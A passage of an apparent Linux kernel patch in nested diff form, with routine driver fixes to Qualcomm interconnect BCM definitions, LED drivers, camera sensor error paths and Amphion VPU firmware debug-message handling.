+@@ -517,8 +726,6 @@ static const struct of_device_id qnoc_of_match[] = {
+ 	  .data = &sm8150_dc_noc},
+ 	{ .compatible = "qcom,sm8150-gem-noc",
+ 	  .data = &sm8150_gem_noc},
+-	{ .compatible = "qcom,sm8150-ipa-virt",
+-	  .data = &sm8150_ipa_virt},
+ 	{ .compatible = "qcom,sm8150-mc-virt",
+ 	  .data = &sm8150_mc_virt},
+ 	{ .compatible = "qcom,sm8150-mmss-noc",
+diff --git a/drivers/interconnect/qcom/sm8150.h b/drivers/interconnect/qcom/sm8150.h
+index 97996f64d799c..023161681fb87 100644
+--- a/drivers/interconnect/qcom/sm8150.h
++++ b/drivers/interconnect/qcom/sm8150.h
+@@ -35,7 +35,7 @@
+ #define SM8150_MASTER_GPU_TCU			24
+ #define SM8150_MASTER_GRAPHICS_3D		25
+ #define SM8150_MASTER_IPA			26
+-#define SM8150_MASTER_IPA_CORE			27
++/* 27 was used by SLAVE_IPA_CORE, now represented as RPMh clock */
+ #define SM8150_MASTER_LLCC			28
+ #define SM8150_MASTER_MDP_PORT0			29
+ #define SM8150_MASTER_MDP_PORT1			30
+@@ -94,7 +94,7 @@
+ #define SM8150_SLAVE_GRAPHICS_3D_CFG		83
+ #define SM8150_SLAVE_IMEM_CFG			84
+ #define SM8150_SLAVE_IPA_CFG			85
+-#define SM8150_SLAVE_IPA_CORE			86
++/* 86 was used by SLAVE_IPA_CORE, now represented as RPMh clock */
+ #define SM8150_SLAVE_LLCC			87
+ #define SM8150_SLAVE_LLCC_CFG			88
+ #define SM8150_SLAVE_MNOC_HF_MEM_NOC		89
+diff --git a/drivers/interconnect/qcom/sm8350.c b/drivers/interconnect/qcom/sm8350.c
+index 5398e7c8d826b..e6e2dcf4574d8 100644
+--- a/drivers/interconnect/qcom/sm8350.c
++++ b/drivers/interconnect/qcom/sm8350.c
+@@ -165,38 +165,283 @@ DEFINE_QNODE(ebi_disp, SM8350_SLAVE_EBI1_DISP, 4, 4);
+ DEFINE_QNODE(qns_mem_noc_hf_disp, SM8350_SLAVE_MNOC_HF_MEM_NOC_DISP, 2, 32, SM8350_MASTER_MNOC_HF_MEM_NOC_DISP);
+ DEFINE_QNODE(qns_mem_noc_sf_disp, SM8350_SLAVE_MNOC_SF_MEM_NOC_DISP, 2, 32, SM8350_MASTER_MNOC_SF_MEM_NOC_DISP);
+ 
+-DEFINE_QBCM(bcm_acv, "ACV", false, &ebi);
+-DEFINE_QBCM(bcm_ce0, "CE0", false, &qxm_crypto);
+-DEFINE_QBCM(bcm_cn0, "CN0", true, &qnm_gemnoc_cnoc, &qnm_gemnoc_pcie);
+-DEFINE_QBCM(bcm_cn1, "CN1", false, &xm_qdss_dap, &qhs_ahb2phy0, &qhs_ahb2phy1, &qhs_aoss, &qhs_apss, &qhs_camera_cfg, &qhs_clk_ctl, &qhs_compute_cfg, &qhs_cpr_cx, &qhs_cpr_mmcx, &qhs_cpr_mx, &qhs_crypto0_cfg, &qhs_cx_rdpm, &qhs_dcc_cfg, &qhs_display_cfg, &qhs_gpuss_cfg, &qhs_hwkm, &qhs_imem_cfg, &qhs_ipa, &qhs_ipc_router, &qhs_mss_cfg, &qhs_mx_rdpm, &qhs_pcie0_cfg, &qhs_pcie1_cfg, &qhs_pimem_cfg, &qhs_pka_wrapper_cfg, &qhs_pmu_wrapper_cfg, &qhs_qdss_cfg, &qhs_qup0, &qhs_qup1, &qhs_qup2, &qhs_security, &qhs_spss_cfg, &qhs_tcsr, &qhs_tlmm, &qhs_ufs_card_cfg, &qhs_ufs_mem_cfg, &qhs_usb3_0, &qhs_usb3_1, &qhs_venus_cfg, &qhs_vsense_ctrl_cfg, &qns_a1_noc_cfg, &qns_a2_noc_cfg, &qns_ddrss_cfg, &qns_mnoc_cfg, &qns_snoc_cfg, &srvc_cnoc);
+-DEFINE_QBCM(bcm_cn2, "CN2", false, &qhs_lpass_cfg, &qhs_pdm, &qhs_qspi, &qhs_sdc2, &qhs_sdc4);
+-DEFINE_QBCM(bcm_co0, "CO0", false, &qns_nsp_gemnoc);
+-DEFINE_QBCM(bcm_co3, "CO3", false, &qxm_nsp);
+-DEFINE_QBCM(bcm_mc0, "MC0", true, &ebi);
+-DEFINE_QBCM(bcm_mm0, "MM0", true, &qns_mem_noc_hf);
+-DEFINE_QBCM(bcm_mm1, "MM1", false, &qnm_camnoc_hf, &qxm_mdp0, &qxm_mdp1);
+-DEFINE_QBCM(bcm_mm4, "MM4", false, &qns_mem_noc_sf);
+-DEFINE_QBCM(bcm_mm5, "MM5", false, &qnm_camnoc_icp, &qnm_camnoc_sf, &qnm_video0, &qnm_video1, &qnm_video_cvp, &qxm_rot);
+-DEFINE_QBCM(bcm_sh0, "SH0", true, &qns_llcc);
+-DEFINE_QBCM(bcm_sh2, "SH2", false, &alm_gpu_tcu, &alm_sys_tcu);
+-DEFINE_QBCM(bcm_sh3, "SH3", false, &qnm_cmpnoc);
+-DEFINE_QBCM(bcm_sh4, "SH4", false, &chm_apps);
+-DEFINE_QBCM(bcm_sn0, "SN0", true, &qns_gemnoc_sf);
+-DEFINE_QBCM(bcm_sn2, "SN2", false, &qns_gemnoc_gc);
+-DEFINE_QBCM(bcm_sn3, "SN3", false, &qxs_pimem);
+-DEFINE_QBCM(bcm_sn4, "SN4", false, &xs_qdss_stm);
+-DEFINE_QBCM(bcm_sn5, "SN5", false, &xm_pcie3_0);
+-DEFINE_QBCM(bcm_sn6, "SN6", false, &xm_pcie3_1);
+-DEFINE_QBCM(bcm_sn7, "SN7", false, &qnm_aggre1_noc);
+-DEFINE_QBCM(bcm_sn8, "SN8", false, &qnm_aggre2_noc);
+-DEFINE_QBCM(bcm_sn14, "SN14", false, &qns_pcie_mem_noc);
+-DEFINE_QBCM(bcm_acv_disp, "ACV", false, &ebi_disp);
+-DEFINE_QBCM(bcm_mc0_disp, "MC0", false, &ebi_disp);
+-DEFINE_QBCM(bcm_mm0_disp, "MM0", false, &qns_mem_noc_hf_disp);
+-DEFINE_QBCM(bcm_mm1_disp, "MM1", false, &qxm_mdp0_disp, &qxm_mdp1_disp);
+-DEFINE_QBCM(bcm_mm4_disp, "MM4", false, &qns_mem_noc_sf_disp);
+-DEFINE_QBCM(bcm_mm5_disp, "MM5", false, &qxm_rot_disp);
+-DEFINE_QBCM(bcm_sh0_disp, "SH0", false, &qns_llcc_disp);
++static struct qcom_icc_bcm bcm_acv = {
++	.name = "ACV",
++	.enable_mask = BIT(3),
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_ce0 = {
++	.name = "CE0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_crypto },
++};
++
++static struct qcom_icc_bcm bcm_cn0 = {
++	.name = "CN0",
++	.keepalive = true,
++	.num_nodes = 2,
++	.nodes = { &qnm_gemnoc_cnoc, &qnm_gemnoc_pcie },
++};
++
++static struct qcom_icc_bcm bcm_cn1 = {
++	.name = "CN1",
++	.keepalive = false,
++	.num_nodes = 47,
++	.nodes = { &xm_qdss_dap,
++		   &qhs_ahb2phy0,
++		   &qhs_ahb2phy1,
++		   &qhs_aoss,
++		   &qhs_apss,
++		   &qhs_camera_cfg,
++		   &qhs_clk_ctl,
++		   &qhs_compute_cfg,
++		   &qhs_cpr_cx,
++		   &qhs_cpr_mmcx,
++		   &qhs_cpr_mx,
++		   &qhs_crypto0_cfg,
++		   &qhs_cx_rdpm,
++		   &qhs_dcc_cfg,
++		   &qhs_display_cfg,
++		   &qhs_gpuss_cfg,
++		   &qhs_hwkm,
++		   &qhs_imem_cfg,
++		   &qhs_ipa,
++		   &qhs_ipc_router,
++		   &qhs_mss_cfg,
++		   &qhs_mx_rdpm,
++		   &qhs_pcie0_cfg,
++		   &qhs_pcie1_cfg,
++		   &qhs_pimem_cfg,
++		   &qhs_pka_wrapper_cfg,
++		   &qhs_pmu_wrapper_cfg,
++		   &qhs_qdss_cfg,
++		   &qhs_qup0,
++		   &qhs_qup1,
++		   &qhs_qup2,
++		   &qhs_security,
++		   &qhs_spss_cfg,
++		   &qhs_tcsr,
++		   &qhs_tlmm,
++		   &qhs_ufs_card_cfg,
++		   &qhs_ufs_mem_cfg,
++		   &qhs_usb3_0,
++		   &qhs_usb3_1,
++		   &qhs_venus_cfg,
++		   &qhs_vsense_ctrl_cfg,
++		   &qns_a1_noc_cfg,
++		   &qns_a2_noc_cfg,
++		   &qns_ddrss_cfg,
++		   &qns_mnoc_cfg,
++		   &qns_snoc_cfg,
++		   &srvc_cnoc
++	},
++};
++
++static struct qcom_icc_bcm bcm_cn2 = {
++	.name = "CN2",
++	.keepalive = false,
++	.num_nodes = 5,
++	.nodes = { &qhs_lpass_cfg, &qhs_pdm, &qhs_qspi, &qhs_sdc2, &qhs_sdc4 },
++};
++
++static struct qcom_icc_bcm bcm_co0 = {
++	.name = "CO0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_nsp_gemnoc },
++};
++
++static struct qcom_icc_bcm bcm_co3 = {
++	.name = "CO3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_nsp },
++};
++
++static struct qcom_icc_bcm bcm_mc0 = {
++	.name = "MC0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &ebi },
++};
++
++static struct qcom_icc_bcm bcm_mm0 = {
++	.name = "MM0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf },
++};
++
++static struct qcom_icc_bcm bcm_mm1 = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 3,
++	.nodes = { &qnm_camnoc_hf, &qxm_mdp0, &qxm_mdp1 },
++};
++
++static struct qcom_icc_bcm bcm_mm4 = {
++	.name = "MM4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf },
++};
++
++static struct qcom_icc_bcm bcm_mm5 = {
++	.name = "MM5",
++	.keepalive = false,
++	.num_nodes = 6,
++	.nodes = { &qnm_camnoc_icp,
++		   &qnm_camnoc_sf,
++		   &qnm_video0,
++		   &qnm_video1,
++		   &qnm_video_cvp,
++		   &qxm_rot
++	},
++};
++
++static struct qcom_icc_bcm bcm_sh0 = {
++	.name = "SH0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc },
++};
++
++static struct qcom_icc_bcm bcm_sh2 = {
++	.name = "SH2",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &alm_gpu_tcu, &alm_sys_tcu },
++};
++
++static struct qcom_icc_bcm bcm_sh3 = {
++	.name = "SH3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_cmpnoc },
++};
++
++static struct qcom_icc_bcm bcm_sh4 = {
++	.name = "SH4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &chm_apps },
++};
++
++static struct qcom_icc_bcm bcm_sn0 = {
++	.name = "SN0",
++	.keepalive = true,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_sf },
++};
++
++static struct qcom_icc_bcm bcm_sn2 = {
++	.name = "SN2",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_gemnoc_gc },
++};
++
++static struct qcom_icc_bcm bcm_sn3 = {
++	.name = "SN3",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxs_pimem },
++};
++
++static struct qcom_icc_bcm bcm_sn4 = {
++	.name = "SN4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xs_qdss_stm },
++};
++
++static struct qcom_icc_bcm bcm_sn5 = {
++	.name = "SN5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xm_pcie3_0 },
++};
++
++static struct qcom_icc_bcm bcm_sn6 = {
++	.name = "SN6",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &xm_pcie3_1 },
++};
++
++static struct qcom_icc_bcm bcm_sn7 = {
++	.name = "SN7",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre1_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn8 = {
++	.name = "SN8",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qnm_aggre2_noc },
++};
++
++static struct qcom_icc_bcm bcm_sn14 = {
++	.name = "SN14",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_pcie_mem_noc },
++};
++
++static struct qcom_icc_bcm bcm_acv_disp = {
++	.name = "ACV",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi_disp },
++};
++
++static struct qcom_icc_bcm bcm_mc0_disp = {
++	.name = "MC0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &ebi_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm0_disp = {
++	.name = "MM0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_hf_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm1_disp = {
++	.name = "MM1",
++	.keepalive = false,
++	.num_nodes = 2,
++	.nodes = { &qxm_mdp0_disp, &qxm_mdp1_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm4_disp = {
++	.name = "MM4",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_mem_noc_sf_disp },
++};
++
++static struct qcom_icc_bcm bcm_mm5_disp = {
++	.name = "MM5",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qxm_rot_disp },
++};
++
++static struct qcom_icc_bcm bcm_sh0_disp = {
++	.name = "SH0",
++	.keepalive = false,
++	.num_nodes = 1,
++	.nodes = { &qns_llcc_disp },
++};
+ 
+ static struct qcom_icc_bcm * const aggre1_noc_bcms[] = {
+ };
+diff --git a/drivers/leds/leds-pwm.c b/drivers/leds/leds-pwm.c
+index cc892ecd52408..6d3e33e8b5f91 100644
+--- a/drivers/leds/leds-pwm.c
++++ b/drivers/leds/leds-pwm.c
+@@ -53,7 +53,7 @@ static int led_pwm_set(struct led_classdev *led_cdev,
+ 		duty = led_dat->pwmstate.period - duty;
+ 
+ 	led_dat->pwmstate.duty_cycle = duty;
+-	led_dat->pwmstate.enabled = duty > 0;
++	led_dat->pwmstate.enabled = true;
+ 	return pwm_apply_state(led_dat->pwm, &led_dat->pwmstate);
+ }
+ 
+diff --git a/drivers/leds/leds-turris-omnia.c b/drivers/leds/leds-turris-omnia.c
+index c7c9851c894a9..179eb243da2f6 100644
+--- a/drivers/leds/leds-turris-omnia.c
++++ b/drivers/leds/leds-turris-omnia.c
+@@ -2,7 +2,7 @@
+ /*
+  * CZ.NIC's Turris Omnia LEDs driver
+  *
+- * 2020 by Marek Behún <kabel@kernel.org>
++ * 2020, 2023 by Marek Behún <kabel@kernel.org>
+  */
+ 
+ #include <linux/i2c.h>
+@@ -41,6 +41,37 @@ struct omnia_leds {
+ 	struct omnia_led leds[];
+ };
+ 
++static int omnia_cmd_write_u8(const struct i2c_client *client, u8 cmd, u8 val)
++{
++	u8 buf[2] = { cmd, val };
++
++	return i2c_master_send(client, buf, sizeof(buf));
++}
++
++static int omnia_cmd_read_u8(const struct i2c_client *client, u8 cmd)
++{
++	struct i2c_msg msgs[2];
++	u8 reply;
++	int ret;
++
++	msgs[0].addr = client->addr;
++	msgs[0].flags = 0;
++	msgs[0].len = 1;
++	msgs[0].buf = &cmd;
++	msgs[1].addr = client->addr;
++	msgs[1].flags = I2C_M_RD;
++	msgs[1].len = 1;
++	msgs[1].buf = &reply;
++
++	ret = i2c_transfer(client->adapter, msgs, ARRAY_SIZE(msgs));
++	if (likely(ret == ARRAY_SIZE(msgs)))
++		return reply;
++	else if (ret < 0)
++		return ret;
++	else
++		return -EIO;
++}
++
+ static int omnia_led_brightness_set_blocking(struct led_classdev *cdev,
+ 					     enum led_brightness brightness)
+ {
+@@ -64,7 +95,7 @@ static int omnia_led_brightness_set_blocking(struct led_classdev *cdev,
+ 	if (buf[2] || buf[3] || buf[4])
+ 		state |= CMD_LED_STATE_ON;
+ 
+-	ret = i2c_smbus_write_byte_data(leds->client, CMD_LED_STATE, state);
++	ret = omnia_cmd_write_u8(leds->client, CMD_LED_STATE, state);
+ 	if (ret >= 0 && (state & CMD_LED_STATE_ON))
+ 		ret = i2c_master_send(leds->client, buf, 5);
+ 
+@@ -114,9 +145,9 @@ static int omnia_led_register(struct i2c_client *client, struct omnia_led *led,
+ 	cdev->brightness_set_blocking = omnia_led_brightness_set_blocking;
+ 
+ 	/* put the LED into software mode */
+-	ret = i2c_smbus_write_byte_data(client, CMD_LED_MODE,
+-					CMD_LED_MODE_LED(led->reg) |
+-					CMD_LED_MODE_USER);
++	ret = omnia_cmd_write_u8(client, CMD_LED_MODE,
++				 CMD_LED_MODE_LED(led->reg) |
++				 CMD_LED_MODE_USER);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Cannot set LED %pOF to software mode: %i\n", np,
+ 			ret);
+@@ -124,8 +155,8 @@ static int omnia_led_register(struct i2c_client *client, struct omnia_led *led,
+ 	}
+ 
+ 	/* disable the LED */
+-	ret = i2c_smbus_write_byte_data(client, CMD_LED_STATE,
+-					CMD_LED_STATE_LED(led->reg));
++	ret = omnia_cmd_write_u8(client, CMD_LED_STATE,
++				 CMD_LED_STATE_LED(led->reg));
+ 	if (ret < 0) {
+ 		dev_err(dev, "Cannot set LED %pOF brightness: %i\n", np, ret);
+ 		return ret;
+@@ -156,12 +187,9 @@ static ssize_t brightness_show(struct device *dev, struct device_attribute *a,
+ 			       char *buf)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct omnia_leds *leds = i2c_get_clientdata(client);
+ 	int ret;
+ 
+-	mutex_lock(&leds->lock);
+-	ret = i2c_smbus_read_byte_data(client, CMD_LED_GET_BRIGHTNESS);
+-	mutex_unlock(&leds->lock);
++	ret = omnia_cmd_read_u8(client, CMD_LED_GET_BRIGHTNESS);
+ 
+ 	if (ret < 0)
+ 		return ret;
+@@ -173,7 +201,6 @@ static ssize_t brightness_store(struct device *dev, struct device_attribute *a,
+ 				const char *buf, size_t count)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct omnia_leds *leds = i2c_get_clientdata(client);
+ 	unsigned long brightness;
+ 	int ret;
+ 
+@@ -183,15 +210,9 @@ static ssize_t brightness_store(struct device *dev, struct device_attribute *a,
+ 	if (brightness > 100)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&leds->lock);
+-	ret = i2c_smbus_write_byte_data(client, CMD_LED_SET_BRIGHTNESS,
+-					(u8)brightness);
+-	mutex_unlock(&leds->lock);
+-
+-	if (ret < 0)
+-		return ret;
++	ret = omnia_cmd_write_u8(client, CMD_LED_SET_BRIGHTNESS, brightness);
+ 
+-	return count;
++	return ret < 0 ? ret : count;
+ }
+ static DEVICE_ATTR_RW(brightness);
+ 
+@@ -247,8 +268,8 @@ static void omnia_leds_remove(struct i2c_client *client)
+ 	u8 buf[5];
+ 
+ 	/* put all LEDs into default (HW triggered) mode */
+-	i2c_smbus_write_byte_data(client, CMD_LED_MODE,
+-				  CMD_LED_MODE_LED(OMNIA_BOARD_LEDS));
++	omnia_cmd_write_u8(client, CMD_LED_MODE,
++			   CMD_LED_MODE_LED(OMNIA_BOARD_LEDS));
+ 
+ 	/* set all LEDs color to [255, 255, 255] */
+ 	buf[0] = CMD_LED_COLOR;
+diff --git a/drivers/leds/trigger/ledtrig-cpu.c b/drivers/leds/trigger/ledtrig-cpu.c
+index 8af4f9bb9cde8..05848a2fecff6 100644
+--- a/drivers/leds/trigger/ledtrig-cpu.c
++++ b/drivers/leds/trigger/ledtrig-cpu.c
+@@ -130,7 +130,7 @@ static int ledtrig_prepare_down_cpu(unsigned int cpu)
+ 
+ static int __init ledtrig_cpu_init(void)
+ {
+-	int cpu;
++	unsigned int cpu;
+ 	int ret;
+ 
+ 	/* Supports up to 9999 cpu cores */
+@@ -152,7 +152,7 @@ static int __init ledtrig_cpu_init(void)
+ 		if (cpu >= 8)
+ 			continue;
+ 
+-		snprintf(trig->name, MAX_NAME_LEN, "cpu%d", cpu);
++		snprintf(trig->name, MAX_NAME_LEN, "cpu%u", cpu);
+ 
+ 		led_trigger_register_simple(trig->name, &trig->_trig);
+ 	}
+diff --git a/drivers/media/cec/platform/Makefile b/drivers/media/cec/platform/Makefile
+index 26d2bc7783944..a51e98ab4958d 100644
+--- a/drivers/media/cec/platform/Makefile
++++ b/drivers/media/cec/platform/Makefile
+@@ -6,7 +6,7 @@
+ # Please keep it in alphabetic order
+ obj-$(CONFIG_CEC_CROS_EC) += cros-ec/
+ obj-$(CONFIG_CEC_GPIO) += cec-gpio/
+-obj-$(CONFIG_CEC_MESON_AO) += meson/
++obj-y += meson/
+ obj-$(CONFIG_CEC_SAMSUNG_S5P) += s5p/
+ obj-$(CONFIG_CEC_SECO) += seco/
+ obj-$(CONFIG_CEC_STI) += sti/
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index 892cd97b7cab7..e8c28902d97e9 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -1234,7 +1234,6 @@ static int max9286_parse_dt(struct max9286_priv *priv)
+ 
+ 		i2c_mux_mask |= BIT(id);
+ 	}
+-	of_node_put(node);
+ 	of_node_put(i2c_mux);
+ 
+ 	/* Parse the endpoints */
+@@ -1298,7 +1297,6 @@ static int max9286_parse_dt(struct max9286_priv *priv)
+ 		priv->source_mask |= BIT(ep.port);
+ 		priv->nsources++;
+ 	}
+-	of_node_put(node);
+ 
+ 	/*
+ 	 * Parse the initial value of the reverse channel amplitude from
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 2ee832426736d..e0019668a8f86 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -2840,12 +2840,22 @@ static int ov5640_try_fmt_internal(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
++static void __v4l2_ctrl_vblank_update(struct ov5640_dev *sensor, u32 vblank)
++{
++	const struct ov5640_mode_info *mode = sensor->current_mode;
++
++	__v4l2_ctrl_modify_range(sensor->ctrls.vblank, OV5640_MIN_VBLANK,
++				 OV5640_MAX_VTS - mode->height, 1, vblank);
++
++	__v4l2_ctrl_s_ctrl(sensor->ctrls.vblank, vblank);
++}
++
+ static int ov5640_update_pixel_rate(struct ov5640_dev *sensor)
+ {
+ 	const struct ov5640_mode_info *mode = sensor->current_mode;
+ 	enum ov5640_pixel_rate_id pixel_rate_id = mode->pixel_rate;
+ 	struct v4l2_mbus_framefmt *fmt = &sensor->fmt;
+-	const struct ov5640_timings *timings;
++	const struct ov5640_timings *timings = ov5640_timings(sensor, mode);
+ 	s32 exposure_val, exposure_max;
+ 	unsigned int hblank;
+ 	unsigned int i = 0;
+@@ -2864,6 +2874,8 @@ static int ov5640_update_pixel_rate(struct ov5640_dev *sensor)
+ 		__v4l2_ctrl_s_ctrl_int64(sensor->ctrls.pixel_rate,
+ 					 ov5640_calc_pixel_rate(sensor));
+ 
++		__v4l2_ctrl_vblank_update(sensor, timings->vblank_def);
++
+ 		return 0;
+ 	}
+ 
+@@ -2906,28 +2918,12 @@ static int ov5640_update_pixel_rate(struct ov5640_dev *sensor)
+ 	__v4l2_ctrl_s_ctrl_int64(sensor->ctrls.pixel_rate, pixel_rate);
+ 	__v4l2_ctrl_s_ctrl(sensor->ctrls.link_freq, i);
+ 
+-	timings = ov5640_timings(sensor, mode);
+ 	hblank = timings->htot - mode->width;
+ 	__v4l2_ctrl_modify_range(sensor->ctrls.hblank,
+ 				 hblank, hblank, 1, hblank);
+ 
+ 	vblank = timings->vblank_def;
+-
+-	if (sensor->current_fr != mode->def_fps) {
+-		/*
+-		 * Compute the vertical blanking according to the framerate
+-		 * configured with s_frame_interval.
+-		 */
+-		int fie_num = sensor->frame_interval.numerator;
+-		int fie_denom = sensor->frame_interval.denominator;
+-
+-		vblank = ((fie_num * pixel_rate / fie_denom) / timings->htot) -
+-			mode->height;
+-	}
+-
+-	__v4l2_ctrl_modify_range(sensor->ctrls.vblank, OV5640_MIN_VBLANK,
+-				 OV5640_MAX_VTS - mode->height, 1, vblank);
+-	__v4l2_ctrl_s_ctrl(sensor->ctrls.vblank, vblank);
++	__v4l2_ctrl_vblank_update(sensor, vblank);
+ 
+ 	exposure_max = timings->crop.height + vblank - 4;
+ 	exposure_val = clamp_t(s32, sensor->ctrls.exposure->val,
+@@ -3913,7 +3909,7 @@ static int ov5640_probe(struct i2c_client *client)
+ 	ret = ov5640_sensor_resume(dev);
+ 	if (ret) {
+ 		dev_err(dev, "failed to power on\n");
+-		goto entity_cleanup;
++		goto free_ctrls;
+ 	}
+ 
+ 	pm_runtime_set_active(dev);
+@@ -3937,8 +3933,9 @@ static int ov5640_probe(struct i2c_client *client)
+ err_pm_runtime:
+ 	pm_runtime_put_noidle(dev);
+ 	pm_runtime_disable(dev);
+-	v4l2_ctrl_handler_free(&sensor->ctrls.handler);
+ 	ov5640_sensor_suspend(dev);
++free_ctrls:
++	v4l2_ctrl_handler_free(&sensor->ctrls.handler);
+ entity_cleanup:
+ 	media_entity_cleanup(&sensor->sd.entity);
+ 	mutex_destroy(&sensor->lock);
+diff --git a/drivers/media/pci/bt8xx/bttv-driver.c b/drivers/media/pci/bt8xx/bttv-driver.c
+index d40b537f4e98b..24ba5729969dc 100644
+--- a/drivers/media/pci/bt8xx/bttv-driver.c
++++ b/drivers/media/pci/bt8xx/bttv-driver.c
+@@ -4248,6 +4248,7 @@ static void bttv_remove(struct pci_dev *pci_dev)
+ 
+ 	/* free resources */
+ 	free_irq(btv->c.pci->irq,btv);
++	del_timer_sync(&btv->timeout);
+ 	iounmap(btv->bt848_mmio);
+ 	release_mem_region(pci_resource_start(btv->c.pci,0),
+ 			   pci_resource_len(btv->c.pci,0));
+diff --git a/drivers/media/platform/amphion/vpu_defs.h b/drivers/media/platform/amphion/vpu_defs.h
+index 667637eedb5d4..7320852668d64 100644
+--- a/drivers/media/platform/amphion/vpu_defs.h
++++ b/drivers/media/platform/amphion/vpu_defs.h
+@@ -71,6 +71,7 @@ enum {
+ 	VPU_MSG_ID_TIMESTAMP_INFO,
+ 	VPU_MSG_ID_FIRMWARE_XCPT,
+ 	VPU_MSG_ID_PIC_SKIPPED,
++	VPU_MSG_ID_DBG_MSG,
+ };
+ 
+ enum VPU_ENC_MEMORY_RESOURSE {
+diff --git a/drivers/media/platform/amphion/vpu_helpers.c b/drivers/media/platform/amphion/vpu_helpers.c
+index 2e78666322f02..66fdb0baea746 100644
+--- a/drivers/media/platform/amphion/vpu_helpers.c
++++ b/drivers/media/platform/amphion/vpu_helpers.c
+@@ -454,6 +454,7 @@ const char *vpu_id_name(u32 id)
+ 	case VPU_MSG_ID_UNSUPPORTED: return "unsupported";
+ 	case VPU_MSG_ID_FIRMWARE_XCPT: return "exception";
+ 	case VPU_MSG_ID_PIC_SKIPPED: return "skipped";
++	case VPU_MSG_ID_DBG_MSG: return "debug msg";
+ 	}
+ 	return "<unknown>";
+ }
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index c2f4fb12c3b64..6b37453eef76c 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -726,6 +726,7 @@ static struct vpu_pair malone_msgs[] = {
+ 	{VPU_MSG_ID_UNSUPPORTED, VID_API_EVENT_UNSUPPORTED_STREAM},
+ 	{VPU_MSG_ID_FIRMWARE_XCPT, VID_API_EVENT_FIRMWARE_XCPT},
+ 	{VPU_MSG_ID_PIC_SKIPPED, VID_API_EVENT_PIC_SKIPPED},
++	{VPU_MSG_ID_DBG_MSG, VID_API_EVENT_DBG_MSG_DEC},
+ };
+ 
+ static void vpu_malone_pack_fs_alloc(struct vpu_rpc_event *pkt,
+diff --git a/drivers/media/platform/amphion/vpu_msgs.c b/drivers/media/platform/amphion/vpu_msgs.c
+index d0ead051f7d18..b74a407a19f22 100644
+--- a/drivers/media/platform/amphion/vpu_msgs.c
++++ b/drivers/media/platform/amphion/vpu_msgs.c
+@@ -23,6 +23,7 @@
+ struct vpu_msg_handler {
+ 	u32 id;
+ 	void (*done)(struct vpu_inst *inst, struct vpu_rpc_event *pkt);
++	u32 is_str;
+ };
+ 
+ static void vpu_session_handle_start_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+@@ -154,7 +155,7 @@ static void vpu_session_handle_error(struct vpu_inst *inst, struct vpu_rpc_event
+ {
+ 	char *str = (char *)pkt->data;
+ 
+-	if (strlen(str))
++	if (*str)
+ 		dev_err(inst->dev, "instance %d firmware error : %s\n", inst->id, str);
+ 	else
+ 		dev_err(inst->dev, "instance %d is unsupported stream\n", inst->id);
+@@ -180,6 +181,21 @@ static void vpu_session_handle_pic_skipped(struct vpu_inst *inst, struct vpu_rpc
+ 	vpu_inst_unlock(inst);
+ }
+ 
++static void vpu_session_handle_dbg_msg(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
++{
++	char *str = (char *)pkt->data;
++
++	if (*str)
++		dev_info(inst->dev, "instance %d firmware dbg msg : %s\n", inst->id, str);
++}
++
++static void vpu_terminate_string_msg(struct vpu_rpc_event *pkt)
++{
++	if (pkt->hdr.num == ARRAY_SIZE(pkt->data))
++		pkt->hdr.num--;
++	pkt->data[pkt->hdr.num] = 0;
++}
++
+ static struct vpu_msg_handler handlers[] = {
+ 	{VPU_MSG_ID_START_DONE, vpu_session_handle_start_done},
+ 	{VPU_MSG_ID_STOP_DONE, vpu_session_handle_stop_done},
